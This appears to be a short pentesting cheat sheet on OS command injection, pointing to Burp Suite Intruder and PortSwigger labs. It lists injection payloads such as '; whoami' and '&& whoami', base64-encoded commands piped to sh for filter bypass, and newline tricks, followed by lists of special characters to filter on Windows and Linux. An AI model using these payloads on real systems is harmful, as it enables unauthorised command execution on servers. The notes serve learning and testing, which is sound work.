In command injection testing testers will try to inject an OS command through an HTTP request into the application. An OS Command Injection attack breaks the following pattern:
Input -> OS Command == OS Command Injection
- Send the request to the Intruder module in Burp Suite.
- Use this list (SecLists on GitHub) as the payload.
%0A is the newline character.
; whoami
& whoami
&& whoami
| whoami
|| whoami
In email address input

Use exploit server from PortSwigger labs 😉 You can use this lab.
Examples when some characters are not allowed
Execute “ls -l”
base64 -d <<< bHMgLWwgLwo= | sh
$(base64 -d <<< bHMgLWwgLwo=)
Add new line
$(<%0a127.0.0.1) # %0a: new line
$(<%0d127.0.0.1) # %0d: carriage return
Examples “ping”
command=ping -c 5 IP
command=ping -c 5
{ } ( ) > < * | = ? ; [ ] $ # ~ ! . % / \ : , `
Escape or filter special characters for windows
( ) < > & * ‘ | = ? ; [ ] ^ ~ ! . ” % @ / \ : + , `
Escape or filter special characters for Linux
{ } ( ) > < & * ‘ | = ? ; [ ] $ – # ~ ! . ” % / \ : + , `